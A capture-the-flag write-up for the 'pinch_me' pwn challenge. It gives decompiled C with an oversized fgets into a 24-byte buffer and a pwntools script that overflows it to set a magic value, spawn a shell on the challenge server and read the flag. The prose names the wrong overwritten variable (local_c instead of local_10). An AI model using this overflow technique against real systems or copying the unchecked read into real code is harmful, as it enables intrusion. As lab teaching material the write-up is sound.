Tags: pwn
Rating:
Preface
-------
We got a binary file which asked us ```Am I dreaming?``` and with basic input prints then ```Pinch me!```
Overview
--------
Loading the binary into *ghidra* we can see, that the interaction happens in the function ```vuln```
```C
void vuln(void)
{
char local_28 [24];
int local_10;
int local_c;
local_c = 0x1234567;
local_10 = -0x76543211;
puts("Is this a real life, or is it just a fanta sea?");
puts("Am I dreaming?");
fgets(local_28,100,stdin);
if (local_10 == 0x1337c0de) {
system("/bin/sh");
}
else {
if (local_c == 0x1234567) {
puts("Pinch me!");
}
else {
puts("Pinch me harder!");
}
}
return;
}
```
Based on this, overwriting the local_c variable with ```0x1337c0de``` gives me a shell.
This was pretty easy, I only needed to be careful to use the correct endianess.
Pwntools provides a function to pack correctly.
My final exploit was.
```Python
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
vulnerable = './pinch_me'
#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)
p.readuntil('Am I dreaming?')
p.sendline(b'\x41'*24 + p64(0x1337c0de))
#p.readuntil('will this work')
p.read( 2048, timeout=1 ) # cleanup output
p.interactive()
```
Then I just needed to print the file ```flag.txt```
The flag was:
```dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}```
